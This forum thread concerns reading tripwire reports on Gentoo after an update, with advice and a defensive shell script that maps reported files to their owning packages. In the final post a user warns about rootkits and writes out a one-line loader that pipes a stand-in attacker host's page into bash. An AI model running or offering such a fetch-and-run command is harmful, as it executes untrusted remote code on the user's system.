# Understanding tripwire?

## FizzyWidget

After reading a report, it told me there were 1500+ modified files all over the system. Not surprising, as I had just updated to KDE 4.8, but how would I know which files to look at, so that if someone managed to get inside my system I know what or where to look?

SSH is not forwarded from my router (no port is), and any time someone needs to connect, ports are only opened as long as I need them open. SSH is also blocked in iptables unless you are on the same IP range, root is disabled, the port has been changed, and it's been told to listen on a single address.

Am I just being too paranoid about security, considering that the system is only for home use and doesn't have any web services running on it? Well, none that are available to the outside world anyway.

I know there are other IDS utils out there, but this was the one that I was recommended.

----------

## FizzyWidget

bump

----------

## wcg

So look at the files in the report. What package do they belong to?

("equery belongs -en /path/to/file")

Are those packages that you updated when you last ran emerge world?

If you can use some text tool (grep, cut, awk, and so on) to get a list of just the pathnames from the report, one per line, then you can have a little loop in a shell script check each one with "equery b -en $PATHNAME". (I do not think "equery belongs ..." handles multiple pathnames in the same command. It simply returns the query result for the last one.)

Are there any listed that were not part of your emerge?

You have to expect a lot of noise from a program like this after "emerge system" and "emerge world".
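The procedure wcg outlines (pull the pathnames out of the report, ask Portage who owns each one, compare the owners against what the last emerge merged) as a small POSIX shell script. This is an added example, not wcg's loop or anything posted in the thread. It assumes the report lists files as quoted absolute paths under `Modified:`/`Added:`/`Removed:` headings (adjust `extract_paths` if your twprint output differs), that `equery` from app-portage/gentoolkit is installed, and it embeds constructed sample data so it can be read offline; `EQUERY` can be pointed at a stub to exercise the logic on a machine without Portage.

```shell
#!/bin/sh
# Added example (not from the thread): triage a tripwire report the way wcg
# describes, mapping each reported path to the Portage package that owns it.
# Assumed report layout (adjust extract_paths if yours differs):
#   Modified:
#   "/usr/bin/kwin"
# Requires equery from app-portage/gentoolkit; EQUERY can be overridden with
# a stub so the logic runs where Portage is absent.

# Constructed sample report fragment; not output from a real tripwire run.
SAMPLE_REPORT='Rule Name: KDE libraries and binaries (/usr)
Severity Level: 66
-------------------------------------------------------------------------------
Modified:
"/usr/bin/kwin"
"/usr/lib64/libkdecore.so.5"
"/bin/bash"
Added:
"/usr/local/bin/not-from-portage"
Removed:
"/usr/lib64/libkdecore.so.4"'

# Constructed list of packages merged by the last "emerge world", one per line
# (in practice derive it from /var/log/emerge.log or `qlop -l`).
SAMPLE_RECENT='kde-base/kwin
kde-base/kdelibs'

# extract_paths: read a report on stdin, print "SECTION<TAB>/path" per file,
# deduplicated, remembering which heading (Modified/Added/Removed) it sat under.
extract_paths() {
    awk '/^(Modified|Added|Removed):$/ { section = $1; sub(/:$/, "", section); next }
         section != "" && /^"\/.*"$/   { gsub(/"/, ""); print section "\t" $0 }' \
    | sort -u
}

# owner_of PATH: print the owning package as category/name, or UNOWNED.
# As wcg notes, equery belongs is queried one path per call.
owner_of() {
    pkg=$("${EQUERY:-equery}" belongs -en "$1" 2>/dev/null | head -n 1)
    if [ -n "$pkg" ]; then printf '%s\n' "$pkg"; else printf 'UNOWNED\n'; fi
}

# classify PATH RECENT_LIST:
#   EXPECTED  owned by a package the last emerge merged (update noise)
#   REVIEW    owned by a package that emerge did not touch
#   UNOWNED   no installed package claims the file
classify() {
    pkg=$(owner_of "$1")
    if [ "$pkg" = UNOWNED ]; then
        printf 'UNOWNED\t%s\n' "$1"
    elif printf '%s\n' "$2" | grep -qxF "$pkg"; then
        printf 'EXPECTED\t%s\t%s\n' "$pkg" "$1"
    else
        printf 'REVIEW\t%s\t%s\n' "$pkg" "$1"
    fi
}

# triage REPORT RECENT_LIST: one labelled line per reported file. Files under
# Removed: cannot have a current owner, so they are labelled rather than queried.
triage() {
    printf '%s\n' "$1" | extract_paths | while IFS="$(printf '\t')" read -r section f; do
        if [ "$section" = Removed ]; then
            printf 'REMOVED\t%s\n' "$f"
        else
            classify "$f" "$2"
        fi
    done
}

# count_flagged REPORT RECENT_LIST: how many files need a human look
# (UNOWNED and REVIEW lines; EXPECTED and REMOVED are not counted).
count_flagged() {
    triage "$1" "$2" | grep -E '^(UNOWNED|REVIEW)' | awk 'END { print NR }'
}

# Stand-alone run against the constructed sample (needs equery for real data):
# triage "$SAMPLE_REPORT" "$SAMPLE_RECENT"
```

On a real system, feed it the printed report (`twprint -m r -r /var/lib/tripwire/report/<file>.twr`) instead of `SAMPLE_REPORT`, and build the recent-package list from the `completed emerge` lines of `/var/log/emerge.log`. The lines worth reading are the `UNOWNED` and `REVIEW` ones; `EXPECTED` is the update noise wcg warns about, and `REMOVED` entries are listed separately because ownership lookups say nothing useful about a file that is gone.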

----------

## FizzyWidget

To be honest, I can't remember what they were now and I don't have the reports now. Don't think anything is amiss; was just wondering for future reference what would be a good way to check.

----------

## joeklow

*Dark Foo wrote:*

> To be honest, I can't remember what they were now and I don't have the reports now. Don't think anything is amiss; was just wondering for future reference what would be a good way to check.

* Once, a whole dorm room of fellow .deb adepts was poisoned by a Perl script which was installed under an ordinary user and loaded via xchat/pidgin (back in those days, they allowed a plugin to run without displaying it on a list).

* .bashrc jokes are still popular.

* And by chance, a good rootkit is able to install itself in seconds after you emerged something (whenever it has control over the terminal window, it can just copy itself over any freshly modified file which is not yet updated in the tripwire db).

So, the rule of thumb is: no friends touching your keyboards.

The quickest rootkit loader can be installed with a 25-character command:

(assuming the attacker owns xxx.me, which serves an evil script as its index page)

```
wget xxx.me -O-|/bin/bash
```

There are other methods to load 'userkits'. Maybe I'll be writing an article about them.

----------

